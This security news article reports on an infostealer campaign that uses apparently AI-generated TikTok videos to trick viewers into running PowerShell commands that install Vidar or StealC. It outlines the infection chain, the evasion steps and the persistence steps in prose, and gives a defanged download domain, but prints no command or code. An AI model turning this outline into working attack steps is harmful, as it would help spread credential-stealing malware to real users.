Infostealer malware strains spread via AI-generated TikTok videos

A newly identified infostealer malware campaign uses TikTok and its extensive user base to spread Vidar and StealC.

According to reports, this campaign departs from conventional malicious strategies. Instead of relying on compromised websites or email attachments, attackers leverage the platform’s vast reach and user trust to distribute harmful software disguised as innocuous video content.

Moreover, the attackers employ short-form videos—reportedly generated with AI tools—to guide viewers in executing PowerShell commands.

These commands are presented as workarounds for activating popular software such as Microsoft Office or Spotify, triggering the malware infection process. However, what sets this tactic apart is the incorporation of verbal and visual cues in the videos, as the commands are never displayed as text or embedded links.

This method allows attackers to bypass conventional security measures. Hence, viewers are deceived into manually entering the commands and inadvertently installing the malware.

 

The infostealer malware campaign was attributed to several TikTok accounts.

 

Investigations revealed that the infostealer malware campaign used multiple TikTok accounts, including @/gitallowed, @/zane.houghton, and @/digitaldreams771.

Though these accounts are inactive, they previously shared similar AI-voiced videos with only slight differences in presentation and payload delivery, indicating a potential use of automation in their creation.

The infection chain initiates when the user executes a PowerShell command that downloads a script from allaivo[.]me. This script subsequently retrieves and installs either Vidar or StealC.

The PowerShell script is designed to evade detection and ensure successful deployment. It hides files within user directories and includes them in the Windows Defender exclusion list, minimising the risk of detection.

It also downloads the malware from a secondary domain and incorporates retry logic to guarantee execution even if initial attempts fail.

To maintain persistence and avoid forensic detection, the script sets up mechanisms to allow the malware to persist through system reboots and erase traces of its existence.

Vidar further conceals its command-and-control (C2) infrastructure by embedding IP addresses within legitimate platforms like Steam and Telegram, allowing it to escape detection by standard network security tools.

Cybersecurity experts regard this campaign as an alert for organisations to update their security strategies. Traditional detection methods fail to recognise threats disseminated via social media, especially those camouflaged by AI-generated content and social engineering methods.

Organisations are encouraged to enhance user education programs, including training on identifying and reporting misleading video content.

Meta Description: AI-generated TikTok videos are used to spread infost